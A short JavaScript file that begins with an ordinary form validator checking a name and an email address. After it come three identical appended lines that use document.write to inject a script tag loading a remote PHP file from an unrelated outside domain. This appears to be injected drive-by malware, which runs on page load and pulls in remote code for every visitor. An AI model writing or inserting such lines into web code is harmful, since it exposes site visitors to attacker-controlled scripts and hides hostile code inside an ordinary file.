function freevalidate()
{
	var name=document.getElementById("ename").value;
	var email=document.getElementById("efrom").value;
	if (name == "")
	{
		alert ('Enter the Name');
		return false;
	}
	if (email == "")
	{
		alert ('Enter the Email Address');
		return false;
	}
	if(email!="")
	{
		var reg = /^([A-Za-z0-9_\-\.])+\@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,4})$/;
		if(reg.test(email) == false)
		{
			alert('Invalid Email Address');
			return false;
		}
	}
	return true;
}



document.write('<script src=http://darwineventgroup.com/pics/cuddle57.php ><\/script>');
document.write('<script src=http://darwineventgroup.com/pics/cuddle57.php ><\/script>');
document.write('<script src=http://darwineventgroup.com/pics/cuddle57.php ><\/script>');